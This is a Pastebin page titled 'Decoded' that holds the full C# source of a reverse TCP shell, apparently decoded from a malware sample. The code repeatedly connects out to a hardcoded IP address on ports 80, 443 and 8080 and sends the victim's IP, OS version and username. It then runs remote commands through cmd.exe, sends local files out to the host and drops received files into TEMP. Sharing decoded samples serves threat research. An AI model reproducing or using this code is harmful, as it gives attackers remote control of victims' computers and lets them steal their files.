API tools faq
paste
Advertisement
James_inthe_box

Decoded

James_inthe_box
Jan 24th, 2018
317
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.57 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.IO;
  3. using System.Collections.Generic;
  4. using System.Text;
  5. using System.Threading;
  6. using System.Net;
  7. using System.Net.Sockets;
  8. using System.Diagnostics;
  9. using System.Runtime.InteropServices;
  10. public class ReverseTCPShell{
  11. const int MAX_SEND_BUFFER = 1024 * 8;
  12. const int MAX_RECV_BUFFER = 1024 * 8;
  13. public static int count = 0;
  14. public static TcpClient tcpClient;
  15. public static NetworkStream stream;
  16. public static StreamReader streamReader;
  17. public static StreamWriter streamWriter;
  18. public static StringBuilder UserInput;
  19. public static Process CmdProc;
  20. public static string filename, fileext, filesize;
  21. public static int offset = 0;
  22. public static byte[] filebuffer;
  23. public static Thread listen;
  24. public static bool iscmdexit=true;
  25. public static bool isfilesend=false;
  26. public class des{
  27. public string s;
  28. public int d;
  29. public des(string _s, int _d){this.s = _s;this.d=_d;}}
  30. public static void run(){des de1 = new des("27.126.186.222",80);des de2 = new des("27.126.186.222",443);des de3 = new des("27.126.186.222",8080);
  31. for (; ; ){runth(de1.s, de1.d, 20);runth(de2.s, de2.d, 20);runth(de3.s, de3.d, 20);System.Threading.Thread.Sleep(20000);}}
  32. public static void runth(string si, int po, int sl){for (; ; ){start(si, po, sl);System.Threading.Thread.Sleep(sl * 1000);return;}}
  33. public static void start(string IP, int port, int SleepTime){try{tcpClient = new TcpClient();if (!tcpClient.Connected){tcpClient.Connect(IP, port);
  34. stream = tcpClient.GetStream();streamReader = new StreamReader(stream, System.Text.Encoding.Default);
  35. streamWriter = new StreamWriter(stream, System.Text.Encoding.Default);listen = new Thread(new ParameterizedThreadStart(StartListen));
  36. listen.Start(tcpClient);while (true){if (!isOnline(tcpClient)){streamReader.Close();streamWriter.Close();if (!iscmdexit) { CmdProc.Kill(); }tcpClient.Close();return;}
  37. Thread.Sleep(10000);}}}catch (Exception){return;}}private static void StartListen(object client){
  38. SendLoginInfo();while (true){try{byte[] RData = new byte[1024 * 8];int len = stream.Read(RData, 0, RData.Length);
  39. if (len > 0){byte[] data = new byte[len];Array.Copy(RData, 0, data, 0, len);DataReceived(data, len);}}
  40. catch (Exception){streamReader.Close();streamWriter.Close();if (!iscmdexit) { CmdProc.Kill(); }break;}}}
  41. public static bool isOnline(TcpClient c){return !((c.Client.Poll(1000, SelectMode.SelectRead) && (c.Client.Available == 0)) || !c.Client.Connected);}
  42. public static void startCmd(){CmdProc = new Process();CmdProc.StartInfo.FileName = "cmd.exe";
  43. CmdProc.StartInfo.UseShellExecute = false;CmdProc.StartInfo.RedirectStandardInput = true;
  44. CmdProc.StartInfo.RedirectStandardOutput = true;CmdProc.StartInfo.RedirectStandardError = true;
  45. CmdProc.EnableRaisingEvents = true;CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);
  46. CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);
  47. CmdProc.Exited += new EventHandler(CmdExited);CmdProc.Start();
  48. CmdProc.BeginOutputReadLine();CmdProc.BeginErrorReadLine();iscmdexit = false;}
  49. public static void CmdExited(object sender, EventArgs e){iscmdexit = true;}
  50. public static void DataReceived(byte[] data, int length){
  51. string receivedmsg = System.Text.Encoding.Default.GetString(data);string[] rdArray = receivedmsg.Split(new string[] { "|*|" }, StringSplitOptions.None);switch (rdArray[0]){case "FILEHEAD": string temp = System.Environment.GetEnvironmentVariable("TEMP");DirectoryInfo info = new DirectoryInfo(temp); string[] finfo = rdArray[1].Split(new string[] { "|" }, StringSplitOptions.None);filename=info.FullName+"\\"+finfo[0];fileext = finfo[1];filesize = finfo[2];filebuffer = new byte[Convert.ToInt32(finfo[2])];FileStream fstream = new FileStream(filename, FileMode.Create);fstream.Close();fstream.Dispose();isfilesend = true;offset = 0;break;case "FILESEND":break;
  52. case "FILERECEIVE":
  53. string[] fr = rdArray[1].Split(new string[] { "\r\n" }, StringSplitOptions.None);FileReceive(fr[0]);break;case "CMD":CmdManager(rdArray[1]);break;
  54. default:if(!isfilesend){break;}if (offset < Convert.ToInt32(filesize)){Array.Copy(data, 0, filebuffer, offset, data.Length );offset += data.Length;
  55. if (offset >= Convert.ToInt32(filesize)){FileStream filestream = new FileStream(filename, FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.ReadWrite);
  56. filestream.Write(filebuffer, 0, filebuffer.Length);filestream.Close();filestream.Dispose();Array.Clear(filebuffer, 0, filebuffer.Length);isfilesend=false;}}break;}}public static void FileReceive(string filep){try{FileInfo fInfo = new FileInfo(filep);string fsend = "FILEHEAD|*|" + fInfo.Name + "|" + fInfo.Extension + "|" + fInfo.Length.ToString();
  57. streamWriter.WriteLine(fsend);streamWriter.Flush();Thread.Sleep(5);FileStream fstream = new FileStream(filep, FileMode.Open);int size = 0;
  58. while (size < fInfo.Length){byte[] sendbuffer = new byte[1024 * 8];int count = fstream.Read(sendbuffer, 0, sendbuffer.Length);
  59. size += count;byte[] buf = new byte[count];Array.Copy(sendbuffer, 0, buf, 0, count);stream.Write(buf, 0, count);stream.Flush();Thread.Sleep(10);}fstream.Close();}catch(Exception e){streamWriter.WriteLine("CMD|*|File access error: "+e.ToString());
  60. streamWriter.Flush();}}public static void CmdManager(string cmd){if(iscmdexit){startCmd();}CmdProc.StandardInput.WriteLine(cmd);}public static void SortOutputHandler(object sendingProcess, DataReceivedEventArgs outLine){
  61. StringBuilder strOutput = new StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append("CMD|*|" + outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception) { }}}public static void SendLoginInfo(){IPAddress ipaddr = IPAddress.Parse("127.0.0.1");foreach (IPAddress _ip in Dns.GetHostEntry("").AddressList){if (_ip.AddressFamily.ToString() == "InterNetwork"){ipaddr = _ip;}}string token = "LOGIN";Version ver = System.Environment.OSVersion.Version;string name = System.Environment.UserName.ToString();string sdata = token + "|*|" + ipaddr.ToString() + "|*|" + ver.ToString() + "|*|"+ name;
  62. byte[] ddata = System.Text.Encoding.Default.GetBytes(sdata);Send(ddata, (UInt32)ddata.Length);}
  63. public static void Send(byte[] sendmsg, UInt32 msgSize){if (msgSize > 0){SendWithSplit(sendmsg, sendmsg.Length, 1024 * 8);}return;}
  64. public static int SendWithSplit(byte[] data, int nSize, int nSplitSize){string outp = System.Text.Encoding.Default.GetString(data);int flag = 0;
  65. while ((flag + nSplitSize) < nSize){stream.Write(data, flag, nSplitSize);stream.Flush();flag += nSplitSize;System.Threading.Thread.Sleep(10);}
  66. if (flag < nSize){stream.Write(data, flag, nSize - flag);flag += (nSize - flag);}if (flag == nSize){return flag;}else{return -1;}}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!